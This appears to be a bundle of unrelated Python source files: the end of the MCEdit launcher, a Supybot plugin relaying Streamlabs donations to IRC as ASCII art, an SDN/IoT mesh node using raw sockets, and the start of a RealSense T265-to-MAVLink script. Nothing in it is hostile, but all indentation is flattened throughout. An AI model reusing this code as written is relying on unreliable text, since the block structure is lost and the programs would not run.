mcedit.loadFile(mcedit.droppedLevel)
cls.version_lock = threading.Lock()
cls.version_info = None
cls.version_checked = False
fetch_version_thread = threading.Thread(target=cls.fetch_version)
fetch_version_thread.start()
if config.settings.closeMinecraftWarning.get():
answer = albow.ask(
"Warning: Only open a world in one program at a time. If you open a world at the same time in MCEdit and in Minecraft, you will lose your work and possibly damage your save file.\n\n If you are using Minecraft 1.3 or earlier, you need to close Minecraft completely before you use MCEdit.",
["Don't remind me again.", "OK"], default=1, cancel=1)
if answer == "Don't remind me again.":
config.settings.closeMinecraftWarning.set(False)
if not config.settings.reportCrashesAsked.get():
answer = albow.ask(
'Would you like to send anonymous error reports to the MCEdit-Unified Team to help with improving future releases?\n\nError reports are stripped of any identifying user information before being sent.\n\nPyClark, the library used, is open source under the GNU LGPL v3 license and is maintained by Podshot. The source code can be located here: https://github.com/Podshot/pyClark.\n\nThere has been no modification to the library in any form.',
['Allow', 'Deny'], default=1, cancel=1
)
if answer == 'Allow':
albow.alert("Error reporting will be enabled next time MCEdit-Unified is launched")
config.settings.reportCrashes.set(answer == 'Allow')
config.settings.reportCrashesAsked.set(True)
config.save()
if "update" in config.version.version.get():
answer = albow.ask(
"There are new default controls. Do you want to replace your current controls with the new ones?",
["Yes", "No"])
if answer == "Yes":
for configKey, k in keys.KeyConfigPanel.presets["WASD"]:
config.keys[config.convert(configKey)].set(k)
config.version.version.set("1.6.0.0")
config.save()
if "-causeError" in sys.argv:
raise ValueError("Error requested via -causeError")
while True:
try:
rootwidget.run()
except (SystemExit, KeyboardInterrupt):
print "Shutting down..."
exc_txt = traceback.format_exc()
if mcedit.editor.level:
if config.settings.savePositionOnClose.get():
mcedit.editor.waypointManager.saveLastPosition(mcedit.editor.mainViewport,
mcedit.editor.level.dimNo)
mcedit.editor.waypointManager.save()
# The following Windows specific code won't be executed if we're using '--debug-wm' switch.
if not USE_WM and sys.platform == "win32" and config.settings.setWindowPlacement.get():
(flags, showCmd, ptMin, ptMax, rect) = mcplatform.win32gui.GetWindowPlacement(
display.get_wm_info()['window'])
X, Y, r, b = rect
if (showCmd == mcplatform.win32con.SW_MINIMIZE or
showCmd == mcplatform.win32con.SW_SHOWMINIMIZED):
showCmd = mcplatform.win32con.SW_SHOWNORMAL
config.settings.windowX.set(X)
config.settings.windowY.set(Y)
config.settings.windowShowCmd.set(showCmd)
# Restore the previous language if we ran with '-tt' (update translation template).
if albow.translate.buildTemplate:
logging.warning('Restoring %s.' % orglang)
config.settings.langCode.set(orglang)
#
config.save()
mcedit.editor.renderer.discardAllChunks()
mcedit.editor.deleteAllCopiedSchematics()
if mcedit.editor.level:
mcedit.editor.level.close()
mcedit.editor.root.RemoveEditFiles()
if 'SystemExit' in traceback.format_exc() or 'KeyboardInterrupt' in traceback.format_exc():
raise
else:
if 'SystemExit' in exc_txt:
raise SystemExit
if 'KeyboardInterrupt' in exc_txt:
raise KeyboardInterrupt
except MemoryError:
traceback.print_exc()
mcedit.editor.handleMemoryError()
def saveWindowPosition(self):
"""Save the window position in the configuration handler."""
if DEBUG_WM:
print "############################ EXITING ############################"
win = self.displayContext.win
# The following Windows specific code will not be executed if we're using '--debug-wm' switch.
if not USE_WM and sys.platform == "win32" and config.settings.setWindowPlacement.get():
(flags, showCmd, ptMin, ptMax, rect) = mcplatform.win32gui.GetWindowPlacement(
display.get_wm_info()['window'])
X, Y, r, b = rect
if (showCmd == mcplatform.win32con.SW_MINIMIZE or
showCmd == mcplatform.win32con.SW_SHOWMINIMIZED):
showCmd = mcplatform.win32con.SW_SHOWNORMAL
config.settings.windowX.set(X)
config.settings.windowY.set(Y)
config.settings.windowShowCmd.set(showCmd)
elif win:
config.settings.windowMaximized.set(self.maximized)
if not self.maximized:
x, y = win.get_position()
else:
x, y = self.saved_pos
if DEBUG_WM:
print "x", x, "y", y
config.settings.windowX.set(x)
config.settings.windowY.set(y)
def restart(self):
self.saveWindowPosition()
config.save()
self.editor.renderer.discardAllChunks()
self.editor.deleteAllCopiedSchematics()
if self.editor.level:
self.editor.level.close()
self.editor.root.RemoveEditFiles()
python = sys.executable
if sys.argv[0].endswith('.exe') or hasattr(sys, 'frozen'):
os.execl(python, python, *sys.argv[1:])
else:
os.execl(python, python, *sys.argv)
def main(argv):
"""
Setup display, bundled schematics. Handle unclean
shutdowns.
"""
try:
display.init()
except pygame.error:
os.environ['SDL_VIDEODRIVER'] = 'directx'
try:
display.init()
except pygame.error:
os.environ['SDL_VIDEODRIVER'] = 'windib'
display.init()
pygame.font.init()
try:
if not os.path.exists(directories.schematicsDir):
shutil.copytree(
#os.path.join(directories.getDataDir(), u'stock-schematics'),
directories.getDataFile('stock-schematics'),
directories.schematicsDir
)
except Exception as e:
logging.warning('Error copying bundled schematics: {0!r}'.format(e))
try:
os.mkdir(directories.schematicsDir)
except Exception as e:
logging.warning('Error creating schematics folder: {0!r}'.format(e))
try:
ServerJarStorage()
except Exception as e:
logging.warning('Error creating server jar storage folder: {0!r}'.format(e))
try:
MCEdit.main()
except Exception as e:
print "mcedit.main MCEdit exited with errors."
logging.error("MCEdit version %s", release.get_version())
display.quit()
if hasattr(sys, 'frozen') and sys.platform == 'win32':
logging.exception("%s", e)
print "Press RETURN or close this window to dismiss."
raw_input()
raise
return 0
def getSelectedMinecraftVersion():
profile = directories.getMinecraftProfileJSON()[directories.getSelectedProfile()]
if 'lastVersionId' in profile:
return profile['lastVersionId']
else:
return '1.8'
def getLatestMinecraftVersion(snapshots=False):
import urllib2
import json
versioninfo = json.loads(
urllib2.urlopen("http://s3.amazonaws.com/Minecraft.Download/versions/versions.json ").read())
if snapshots:
return versioninfo['latest']['snapshot']
else:
return versioninfo['latest']['release']
def weird_fix():
try:
from OpenGL.platform import win32
except Exception:
pass
class FakeStdOutErr:
"""Fake file object to redirect very last Python output.
Used to track 'errors' not handled in MCEdit.
Mimics 'write' and 'close' file objects methods.
Used on Linux only."""
mode = 'a'
def __init__(self, *args, **kwargs):
"""*args and **kwargs are ignored.
Deletes the 'logger' object and reopen 'logfile' in append mode."""
global logger
global logfile
del logger
self.fd = open(logfile, 'a')
def write(self, msg):
self.fd.write(msg)
def close(self, *args, **kwargs):
self.fd.flush()
self.fd.close()
if __name__ == "__main__":
try:
main(sys.argv)
except (SystemExit, KeyboardInterrupt):
# On Linux it happens that Python tries to kill already-dead processes and displays errors in the console.
# Redirecting them to the log file preserves them, along with any other errors which may occur.
if sys.platform == "linux2":
logger.debug("MCEdit is exiting normally.")
logger.debug("Lines below this one are pure Python output.")
sys.stdout = sys.stderr = FakeStdOutErr()
mcworld_support.close_all_temp_dirs()
pass
except:
mcworld_support.close_all_temp_dirs()
traceback.print_exc()
print ""
print "=================================="
print "\t\t\t MCEdit has crashed"
print "=================================="
raw_input("Press the Enter key to close this window")
pass
|
plugin.py
|
###
# Copyright (c) 2020, Triple A
# All rights reserved.
#
#
###
from supybot import utils, plugins, ircutils, callbacks
from supybot.commands import *
try:
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization('StreamlabsIRC')
except ImportError:
# Placeholder that allows the plugin to run on a bot
# without the i18n module
_ = lambda x: x
from supybot import ircmsgs
import websocket
import json
import pprint
import time
import threading
import os
from chardet import detect
class StreamlabsIRC(callbacks.Plugin):
"""Uses Streamlabs API to play ASCII in IRC channels requested by donations."""
threaded = True
# https://stackoverflow.com/a/53851783
# get file encoding type
def get_encoding_type(self, file_name):
with open(file_name, 'rb') as f:
rawdata = f.read()
return detect(rawdata)['encoding']
def scroll(self, ascii_name, donor_name, donation_amount):
print('scroll')
ascii_filename = ascii_name + '.txt'
if ascii_filename in os.listdir(self.ascii_directory):
print(ascii_name + ': ascii_found')
self.irc.queueMsg(ircmsgs.privmsg(self.channel_name, '{} has requested the "{}" ascii by donating {}'.format(donor_name, ascii_name, donation_amount)))
ascii_filename_txt = os.path.join(self.ascii_directory, ascii_filename)
print(ascii_filename_txt)
from_codec = self.get_encoding_type(ascii_filename_txt)
print(from_codec)
with open(ascii_filename_txt, 'r', encoding=from_codec) as f:
# with open(os.path.join(self.ascii_directory, ascii_filename), 'r') as f:
# ascii_lines = f.read().encode('utf-8').split('\n')
# ascii_text = f.read().encode('utf-8')
ascii_text = f.read()
ascii_lines = ascii_text.replace('\r\n', '\n').split('\n')
for line in ascii_lines:
self.irc.queueMsg(ircmsgs.privmsg(self.channel_name, line))
else:
self.irc.queueMsg(ircmsgs.privmsg(self.channel_name, '"{}" ascii not found :<'.format(ascii_name)))
def stream_sock(self):
def on_message(ws, message):
if 'event' not in message:
return
first_square_bracket_index = message.find('[')
if first_square_bracket_index == -1:
return
message_list_string = message[first_square_bracket_index:]
message_list = json.loads(message_list_string)
if message_list[1]['type'] != 'donation':
return
pprint.pprint(message_list)
donor_name = message_list[1]['message'][0]['from']
donation_amount = message_list[1]['message'][0]['formatted_amount']
donation_message = message_list[1]['message'][0]['message']
if donation_message.startswith('!ascii '):
self.scroll(donation_message.split('!ascii ')[1], donor_name, donation_amount)
# self.scroll('vap0r-trex', donor_name, donation_amount)
else:
self.irc.queueMsg(ircmsgs.privmsg(self.channel_name, '{} donated {} with the message "{}"'.format(donor_name, donation_amount, donation_message)))
def on_error(ws, error):
print(error)
def on_close(ws):
print("### closed ###")
def on_open(ws):
print("### open ###")
def run(*args):
count = 0
while True:
print('ping {}'.format(count))
count += 1
ws.send("2")
time.sleep(15)
self.ws_ping = threading.Thread(target=run)
self.ws_ping.daemon = False
self.ws_ping.start()
print('stream_sock')
# websocket.enableTrace(True)
self.ws = websocket.WebSocketApp("wss://sockets.streamlabs.com/socket.io/?token={}&EIO=3&transport=websocket".format(self.streamlabs_socket_token), on_message = on_message, on_error = on_error, on_close = on_close)
self.ws.on_open = on_open
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = False
self.wst.start()
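# Illustrative note: Streamlabs delivers socket.io frames such as
# '42["event",{"type":"donation","message":[...]}]'; on_message above strips
# the numeric prefix by locating the first '[' and JSON-decoding the rest.
# A minimal standalone sketch of the same parse:
#
#     import json
#     frame = '42["event",{"type":"donation"}]'
#     event_name, payload = json.loads(frame[frame.find('['):])
#     # event_name == 'event'; payload['type'] == 'donation'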
def __init__(self, irc):
print('__init__')
self.ascii_directory = ""
self.channel_name = ""
self.streamlabs_socket_token = ""
print(self.ascii_directory, self.channel_name, self.streamlabs_socket_token)
self.irc = irc
self.__parent = super(StreamlabsIRC, self)
self.__parent.__init__(irc)
self.stream_sock()
Class = StreamlabsIRC
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
node.py
|
#!/usr/bin/python3
import socket
import sys
import binascii
import time
import threading
import logging
import _thread
SDN_CONTROLLER_ADDRESS = '10.0.254.1'
SDN_CONTROLLER_PORT = 14323
TICK_TIME = 1
class RootNode(threading.Thread):
def __init__(self, evntObj, cachLck, cache):
threading.Thread.__init__(self)
self.rootCon = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0) # Root node's connection towards controller
self.rootCon.connect((SDN_CONTROLLER_ADDRESS, SDN_CONTROLLER_PORT))
self.rootCon.setblocking(0)
self.evntObj = evntObj
self.rootLck = threading.Lock()
self.cachLck = cachLck
self.cache = cache
def run(self):
with self.rootCon :
while True :
self.evntObj.wait(10)
_rcvData = None
try:
with self.rootLck:
_rcvData = str(self.rootCon.recv(1024))
logging.warning("[rootSend][ROOT] : _rcvData {}".format(_rcvData))
if _rcvData :
with self.cachLck :
self.cache['ctr']['sdn']['nm'] = True
self.cache['ctr']['sdn']['msh'] = _rcvData
# [NOTE] Not useful to process the SDN control packet in root thread. It should be processed
# by node thread
# if 'net_map_stop' in _rcvData :
# with self.cachLck :
# self.cache['ctr']['dwn_sdn_msg']['ctMng_on_off'] = 2 # 0 - default 1 - on 2 - off
except BlockingIOError:
pass
def rootSend(self, payload):
with self.rootLck:
_totalBytes = self.rootCon.send(bytes(payload, 'utf8'))
logging.info("[rootSend][ROOT] : Total sent {} bytes".format(_totalBytes))
return _totalBytes
class NodeUtilities:
def macAddressGetter(self, nodeNum) :
with open('/sys/class/net/wpan{}/address'.format(nodeNum), 'r') as f :
strng = f.readline()
strng = b''.join(binascii.unhexlify(x) for x in strng[:-1].split(':')) # This should be ':' since MAC address is delimited by ':' only
return strng
def internalCounter(self):
while True:
if not self.counter :
self.counter = 254
else :
self.counter -= 1
self.evntObj.wait(10)
logging.debug("node.nodeUtilities: [_internalCounter] self.counter {}".format(self.counter))
return
class PriCtrlPlaneUnit(NodeUtilities, RootNode, threading.Thread): # order in the base-class list is important; it determines the inheritance order (MRO)
# It works for only one pkt format 41c8 broadcast with long source address
#_ctlPlnThrd = PriCtrlPlaneUnit(evntObj=_event_obj, sockLck=_sockLck, macRwsk=l2_sock, cachLck=_cachLck, cache=_cache, rootNode=_rootNodeThrd)
def __init__(self, evntObj, sockLck, macRwsk, cachLck, cache, macAdrs=None, pktBffr=b'\x41\xc8\x00\xff\xff\xff\xff', rcvdPkt=None, nodeType='ccn', rootNode=None) :
# Call the Thread class's init function
threading.Thread.__init__(self)
self.evntObj = evntObj # Node's common clock
self.sockLck = sockLck # Socket Lock allowing atomicity
self.cachLck = cachLck # Node cache lock allowing atomicity
self.macRwsk = macRwsk # Node's MAC RAW socket
self.cache = cache # Node's cache
with self.cachLck :
_getVal = self.cache['nod']
if not macAdrs :
self.macAdrs = self.macAddressGetter(_getVal) # Node's MAC address
else :
self.macAdrs = macAdrs
self.pktBffr = pktBffr # Node's packet buffer
self.rcvdPkt = rcvdPkt # Received packet buffer
if nodeType == 'ccn' :
self.topic = None # Node's self topic
self.rootNod = rootNode
# Preconfigured values
self.counter = 254 # System Clock
threading.Thread(target=self.internalCounter, args=()).start()
self.nodeRnk = 254 # Node's rank in the network
self.topic = self.macAdrs[-1:]
logging.debug('[priCtrlPlaneUnit][TPC][SELF] : {}'.format(bytes(self.topic)))
# Reference variable for length of cache 'pav'
with self.cachLck:
self.lenCachePav = str(self.cache['pav']).__len__()
logging.debug('[priCtrlPlaneUnit][MAC][ADRS] : {}'.format(self.macAdrs))
return
def __dictToSerial(self, dic):
if not isinstance(dic, dict) :
return dic
strng = ''
for key in dic.keys():
try:
if int(dic[key]['r']) < self.nodeRnk :
continue
except (TypeError, KeyError):
pass
try:
if int(key) < 10 :
strng += '0' + key
else :
strng += key
except ValueError :
strng += key
strng += str(self.__dictToSerial(dic[key]))
return strng
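# Illustrative worked example: with self.nodeRnk == 1,
# __dictToSerial({'12': {'r': '3'}}) keeps key '12' (no leading zero since it
# is >= 10), then appends the non-numeric key 'r' and the leaf value '3',
# producing '12r3'.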
def _recvProcess(self):
self.rcvdPkt = None
# Receive packets
try:
with self.sockLck:
self.rcvdPkt = self.macRwsk.recvfrom(123)
logging.info('[_recvProcess][RCVD][PKT] : {}'.format(self.rcvdPkt))
except BlockingIOError:
pass
return
def _pktProcessngProcess(self):
_valHolder = [False, False]
""" Received message validity flags
[0] -> Valid conn req flag
[1] -> Hold SDN msg
"""
_tmpHld = str(self.rcvdPkt[0]).split('>')
logging.debug('[_pktProcessngProcess][PKT] : {}'.format(_tmpHld))
for index in range(1, _tmpHld.__len__() - 1, 2): # Processing each attribute at a time for now
_attribute = _tmpHld[index] # only one attribute/value pair is transmitted
_value = _tmpHld[index+1]
logging.debug('[_pktProcessngProcess][PKT] : {} {}'.format(_attribute, _value)) # Debug takes only str as argument
# Connection request in packet
if 'con' in _attribute :
if int(_value[1:]) > self.nodeRnk :
logging.info('[_pktProcessngProcess][CON] : {}'.format(_tmpHld[0][-2:]))
_valHolder[0] = True
continue
# New SDN message
if 'sdn' in _attribute :
    _valHolder[1] = True
    continue
if _valHolder[0] and 'nod' in _attribute :
with self.cachLck :
_getVal = self.cache['nod']
if not _getVal :
self.rootNod.rootSend(payload='con_req:' + _value)
else :
self._broadcastConnectionRequest(payload=_value)
continue
# [NOTE] We may want to process the SDN message in _cachConfigUpdation instead.
# Rationale: it makes sense there since we are already updating the cache,
# which holds all of the node's configuration.
if _valHolder[1] and 'rnk' in _attribute : # without the _valHolder guard, the plain 'rnk' branch below would also run
    if int(_value) < self.nodeRnk :
        with self.cachLck: # the class defines cachLck, not lock
            self.cache['ctr']['sdn']['nm'] = True
            self.cache['ctr']['sdn']['msg'] = _tmpHld
# Rank in packet
if 'rnk' in _attribute :
with self.cachLck:
# Rank setter
if int(_value) < self.nodeRnk :
self.nodeRnk = 2 * int(_value)
logging.info('[_pktProcessngProcess][SETG][RNK] : my rank is {}'.format(self.nodeRnk))
self.cache['pav'][str(self.rcvdPkt[1][-1][0])] = dict(r=_value)
self.cache['ctr']['rnk']['brd'] = 3 # We're going to introduce a TTL-like concept
# Receive down nodes' ranks
elif int(_value) >= self.nodeRnk :
logging.info('[_pktProcessngProcess][RECV][RNK] : node {} rank {}'.format(self.rcvdPkt[1][-1][0], _value))
self.cache['pav'][str(self.rcvdPkt[1][-1][0])] = dict(r=_value)
logging.info('[_pktProcessngProcess][CACHE][PAV] : {}'.format(self.cache['pav']))
continue
# Network map in packet
if 'pav' in _attribute :
logging.info('[_pktProcessngProcess][RECV][PAV] : node {} lowerRank {}'.format(self.rcvdPkt[1][-1][0], _value))
with self.cachLck:
try:
if int(self.cache['pav'][str(self.rcvdPkt[1][-1][0])]['r']) <= self.nodeRnk :
continue
except (KeyError, TypeError):
pass
try:
self.cache['pav'][str(self.rcvdPkt[1][-1][0])]['d'] = _value + 'D'
except KeyError:
self.cache['pav'][str(self.rcvdPkt[1][-1][0])] = dict(d=(_value+'D'))
logging.debug('[_pktProcessngProcess][CACHE][PAV] : {}'.format(self.cache['pav']))
continue
return
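# Sketch of the assumed on-air attribute format (inferred from the parsing
# above, not from a spec): a payload such as b'<hdr+mac>rnk>3>' is split on
# '>' so that odd indices hold attribute names ('rnk') and the following
# even indices hold their values ('3'); index 0 carries the header/MAC
# residue. A node that receives 'rnk' with a value below its own rank adopts
# twice that value as its new rank (see the rank setter above).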
def _broadcastProcess(self, sendBuffer):
with self.sockLck:
_totalBytes = self.macRwsk.send(sendBuffer + bytes(str(self.nodeRnk) + '>', 'utf8'))
logging.info('[_broadcastProcess][SENT][PKT] : Total sent {} bytes'.format(_totalBytes))
with self.cachLck:
self.cache['ctr']['rnk']['brd'] -= 1
return
def _broadcastNetMap(self):
_cachPav = None
with self.cachLck:
_cachPav = self.cache['pav']
logging.debug('[_broadcastNetMap] len(_cachPav) {} refLenCachePav {} counter {}'.format(len(_cachPav), self.lenCachePav, self.counter))
try:
with self.sockLck:
_totalBytes = self.macRwsk.send(self.pktBffr + self.macAdrs + b'>pav>' + bytes(self.__dictToSerial(_cachPav), 'utf8') + b'>')
logging.info('[_broadcastNetMap][SENT][PKT] : Total sent {} bytes'.format(_totalBytes))
# Sending the network map towards controller
with self.cachLck :
_getVal = self.cache['nod']
if not _getVal :
self.rootNod.rootSend('net_map:' + self.__dictToSerial(_cachPav))
except OSError:
logging.debug(self.__dictToSerial(_cachPav))
return
def _broadcastConnectionRequest(self, payload=''):
# Connection requests are used for inter-domain communication only
# If the communication request is approved, only the specified nodes cache the specific data
with self.cachLck :
_getVal = self.cache['nod']
payload += '<' + str(_getVal)
with self.sockLck:
_totalBytes = self.macRwsk.send(self.pktBffr + self.macAdrs + b'>con>r' + bytes(str(self.nodeRnk), 'utf8') + b'>nod>' + bytes(payload, 'utf8') + b'>')
logging.warning('[_broadcastConnectionRequest] payload {}'.format(payload))
logging.info('[_broadcastConnectionRequest][SENT][PKT] : Total sent {} bytes'.format(_totalBytes))
return
def _cachConfigUpdation(self):
# with self.cachLck:
# if self.cache['ctr']['dwn_sdn_msg']['ctMng_on_off'] :
# if self.cache['ctr']['dwn_sdn_msg']['ctMng_on_off'] == 2:
# self.cache['ctr']['rnk']['m_brd'] = False
# self.cache['ctr']['con']['brd'] = True
# elif self.cache['ctr']['dwn_sdn_msg']['ctMng_on_off'] == 1 :
# self.cache['ctr']['rnk']['m_brd'] = False
# self.cache['ctr']['con']['brd'] = True
# Propagating down the new SDN msg
self._broadcastProcess(self.pktBffr + self.macAdrs + bytes('>d_sdn_m>1>rnk>{}'.format(self.nodeRnk), 'utf8'))
# Change logWmsg to control logging in this function
def run(self, logWmsg=True):
_sendBuffer = self.pktBffr + self.macAdrs + bytes('>rnk>', 'utf8')
# Root node
with self.cachLck :
_getVal = self.cache['nod']
if not _getVal and self.nodeRnk == 254 :
self.nodeRnk = 1
_sendBuffer += bytes(str(self.nodeRnk) + '>', 'utf8')
with self.cachLck:
self.cache['ctr']['rnk']['brd'] = 3
# Node Process Begins
while True :
# Main continuous process
# Receive function
_getVal = None
with self.cachLck:
logging.debug("[run] self.cache {}".format(self.cache))
_getVal = self.cache['ctr']['rcv']
if _getVal :
self._recvProcess()
logWmsg and logging.warning('[run] Receiving...')
# Received packet processing
if self.rcvdPkt :
self._pktProcessngProcess()
# Broadcast rank
_getVal = None
with self.cachLck:
_getVal = self.cache['ctr']['rnk']['brd'] and self.cache['ctr']['rnk']['m_brd']
if _getVal :
self._broadcastProcess(_sendBuffer)
logWmsg and logging.warning('[run] Broadcasting Rank...')
# Wait for next tick
self.evntObj.wait(10)
# Process new configuration
# [COMPLETED] should set a flag if I need to process this time can either from root thread or pkt processing function
_getVal = None
with self.cachLck:
_getVal = self.cache['ctr']['sdn']['nm']
if _getVal :
self._cachConfigUpdation()
# Connection request Broadcast
_getVal = None
with self.cachLck:
_getVal = self.cache['ctr']['con']['brd']
if _getVal and self.nodeRnk != 254 :
self._broadcastConnectionRequest()
logWmsg and logging.warning('[run] Broadcasting Connection Request...')
# Broadcast network map
_getVal = []
with self.cachLck:
_getVal.append(self.cache['ctr']['rnk']['m_brd'])
if _getVal[0] :
_getVal.append(len(str(self.cache['pav'])))
if _getVal[0] and _getVal[1] != self.lenCachePav and not self.counter % 3 :
self.lenCachePav = _getVal[1]
with self.cachLck:
logging.debug('[run] Broadcasting Map: self.cache[\'pav\'] {}'.format(self.cache['pav']))
self._broadcastNetMap()
logWmsg and logging.warning('[run] Broadcasting Network Map...')
return
class PriDataPlaneUnit(threading.Thread, NodeUtilities):
def __init__(self, sockLck=None, cachLck=None, cache=None, macAdrs=None, pktBffr=b'\x41\xc8\x00\xff\xff\xff\xff'):
threading.Thread.__init__(self)
self.sockLck = sockLck # Socket lock shared with the control plane (was missing; run() relies on it)
self.cachLck = cachLck # Node cache lock allowing atomicity (was missing)
self.cache = cache # Node's cache (was missing)
with self.cachLck :
_getVal = self.cache['nod']
if not macAdrs :
self.macAdrs = self.macAddressGetter(_getVal) # Node's MAC address
else :
self.macAdrs = macAdrs
self.pktBffr = pktBffr + self.macAdrs # Use the resolved MAC address, not the possibly-None argument
return
# This class must contain generic topic/data senders and receivers
# [NOTE] Connection_request always belongs in the control plane
# Random intra-domain communication handler
def run(self):
while True :
with self.sockLck :
pass
return
if __name__ == "__main__" :
_rootNodeThrd = None
# Creating a threading lock
_sockLck = threading.Lock()
_cachLck = threading.Lock()
# Temporary cache storage with limited capability of python dict
# [INFO] Keep key in 3 characters for fast processing
_cache = {
'nod': None, # Node number
# Maybe hold the counter value when it changes; if the change is recent, process it
'ctr': {
'rcv': 1,
'rnk': {
'brd': 0,
'm_brd' : True
},
'con': {
'req': None,
'brd': None,
},
'pri': [],
'sdn': {
'nm' : False, # New message
'msg': '' # Actual message
},
},
'pav': {} # Dict of lower rank nodes
}
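# Example of an assumed 'pav' entry after neighbour discovery (shape inferred
# from _pktProcessngProcess): {'5': {'r': '3', 'd': '07D'}} means the node at
# address 5 advertised rank 3 plus a serialised map of its own descendants,
# terminated with 'D'.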
# Initialising an event object
_event_obj = threading.Event()
try:
_cache['nod'] = int(sys.argv[1])
except ValueError :
raise Exception("Incorrect value for number of nodes")
except IndexError :
raise Exception("No value for number of nodes")
# Create logging
logging.basicConfig(
filename='/home/priyan/code/sdn-iot-ip-icn/log/wpan{}.log'.
format(_cache['nod']),
filemode='a',
level=logging.WARNING,
format=("%(asctime)s-%(levelname)s-%(filename)s-%(lineno)d "
"%(message)s"),
datefmt='%d/%m/%Y %H:%M:%S'
)
try:
_cache['ctr']['con']['req'] = True if sys.argv[2] else None
logging.warning("Connection request ON")
except IndexError :
pass
try:
_cache['ctr']['con']['brd'] = True if sys.argv[3] == 'a' else False
logging.warning("AD HOC request ON")
except IndexError :
pass
# Creating a common layer 2 socket between control and data plane
l2_sock = socket.socket(family=socket.AF_PACKET, type=socket.SOCK_RAW, proto=socket.ntohs(0x0003))
l2_sock.bind(('wpan{}'.format(_cache['nod']), 0, socket.PACKET_BROADCAST)) # _cache['nod'] is the node ID number
l2_sock.setblocking(0)
logging.warning('l2_socket established')
_rootNodeThrd = RootNode(evntObj=_event_obj, cachLck=_cachLck, cache=_cache) if not _cache['nod'] else None
_ctlPlnThrd = PriCtrlPlaneUnit(evntObj=_event_obj, sockLck=_sockLck, macRwsk=l2_sock, cachLck=_cachLck, cache=_cache, rootNode=_rootNodeThrd)
try:
# We've created a class because in the future we may have two separate sockets
# to deal with control and data packets separately
if _rootNodeThrd :
_rootNodeThrd.start()
logging.warning('Started Root Node...')
_ctlPlnThrd.start()
logging.warning('Started Control Plane...')
#datPlnThrd = PriDataPlaneUnit(l2_sock)
#datPlnThrd.start()
#logging.warning('started data plane')
while True: # Without this hold-up, the finally clause would execute immediately
_event_obj.clear()
time.sleep(TICK_TIME)
_event_obj.set()
finally:
l2_sock.close()
# Closing threads
if _rootNodeThrd :
_rootNodeThrd.join()
_ctlPlnThrd.join()
_thread.exit()
|
t265_to_mavlink.py
|
#!/usr/bin/env python3
#####################################################
## librealsense T265 to MAVLink ##
#####################################################
# This script assumes pyrealsense2.[].so file is found under the same directory as this script
# Install required packages:
# pip install pyrealsense2
# pip install transformations
# pip3 install dronekit
# pip3 install apscheduler
# Set the path for IDLE
import sys
sys.path.append("/usr/local/lib/")
# Set MAVLink protocol to 2.
import os
os.environ["MAVLINK20"] = "1"
# Import the libraries
import pyrealsense2 as rs
import numpy as np
import transformations as tf
import math as m
import time
import argparse
import threading
from time import sleep
from apscheduler.schedulers.background import BackgroundScheduler
from dronekit import connect, VehicleMode
from pymavlink import mavutil
#######################################
# Parameters
#######################################
# Default configurations for connection to the FCU
connection_string_default = '/dev/ttyUSB0'
connection_baudrate_default = 921600
connection_timeout_sec_default = 5
# Transformation to convert different camera orientations to NED convention. Replace camera_orientation_default for your configuration.
# 0: Forward, USB port to the right
# 1: Downfacing, USB port to the right
# 2: Forward, 45 degree tilted down
# Important note for downfacing camera: you need to tilt the vehicle's nose up a little - not flat - before you run the script, otherwise the initial yaw will be randomized, read here for more details: https://github.com/IntelRealSense/librealsense/issues/4080. Tilt the vehicle to any other sides and the yaw might not be as stable.
camera_orientation_default = 0
# https://mavlink.io/en/messages/common.html#VISION_POSITION_ESTIMATE
enable_msg_vision_position_estimate = True
vision_position_estimate_msg_hz_default = 30
# https://mavlink.io/en/messages/ardupilotmega.html#VISION_POSITION_DELTA
enable_msg_vision_position_delta = False
vision_position_delta_msg_hz_default = 30
# https://mavlink.io/en/messages/common.html#VISION_SPEED_ESTIMATE
enable_msg_vision_speed_estimate = True
vision_speed_estimate_msg_hz_default = 30
# https://mavlink.io/en/messages/common.html#STATUSTEXT
enable_update_tracking_confidence_to_gcs = True
update_tracking_confidence_to_gcs_hz_default = 1
# Default global position for EKF home/ origin
enable_auto_set_ekf_home = False
home_lat = 151269321 # Somewhere random
home_lon = 16624301 # Somewhere random
home_alt = 163000 # Somewhere random
# TODO: Taken care of by ArduPilot, so can be removed (once the handling on AP side is confirmed stable)
# In NED frame, offset from the IMU or the center of gravity to the camera's origin point
body_offset_enabled = 0
body_offset_x = 0 # In meters (m)
body_offset_y = 0 # In meters (m)
body_offset_z = 0 # In meters (m)
# Global scale factor, position x y z will be scaled up/down by this factor
scale_factor = 1.0
# Enable using yaw from compass to align north (zero degree is facing north)
compass_enabled = 0
# pose data confidence: 0x0 - Failed / 0x1 - Low / 0x2 - Medium / 0x3 - High
pose_data_confidence_level = ('FAILED', 'Low', 'Medium', 'High')
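# The main loop later remaps this 0-3 confidence onto a 0-100 scale for the
# VISION_POSITION_DELTA message via tracker_confidence * 100 / 3
# (0, 33.3, 66.6 or 100).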
# lock for thread synchronization
lock = threading.Lock()
#######################################
# Global variables
#######################################
# FCU connection variables
vehicle = None
is_vehicle_connected = False
# Camera-related variables
pipe = None
pose_sensor = None
linear_accel_cov = 0.01
angular_vel_cov = 0.01
# Data variables
data = None
prev_data = None
H_aeroRef_aeroBody = None
V_aeroRef_aeroBody = None
heading_north_yaw = None
current_confidence_level = None
current_time_us = 0
# Incremented every time pose jumping or relocalization happens
# See here: https://github.com/IntelRealSense/librealsense/blob/master/doc/t265.md#are-there-any-t265-specific-options
# For AP, a non-zero "reset_counter" would mean that we could be sure that the user's setup was using mavlink2
reset_counter = 1
#######################################
# Parsing user inputs
#######################################
parser = argparse.ArgumentParser(description='Relay RealSense T265 pose data to ArduPilot over MAVLink')
parser.add_argument('--connect',
help="Vehicle connection target string. If not specified, a default string will be used.")
parser.add_argument('--baudrate', type=float,
help="Vehicle connection baudrate. If not specified, a default value will be used.")
parser.add_argument('--vision_position_estimate_msg_hz', type=float,
help="Update frequency for VISION_POSITION_ESTIMATE message. If not specified, a default value will be used.")
parser.add_argument('--vision_position_delta_msg_hz', type=float,
help="Update frequency for VISION_POSITION_DELTA message. If not specified, a default value will be used.")
parser.add_argument('--vision_speed_estimate_msg_hz', type=float,
help="Update frequency for VISION_SPEED_DELTA message. If not specified, a default value will be used.")
parser.add_argument('--scale_calib_enable', default=False, action='store_true',
help="Scale calibration. Only run while NOT in flight")
parser.add_argument('--camera_orientation', type=int,
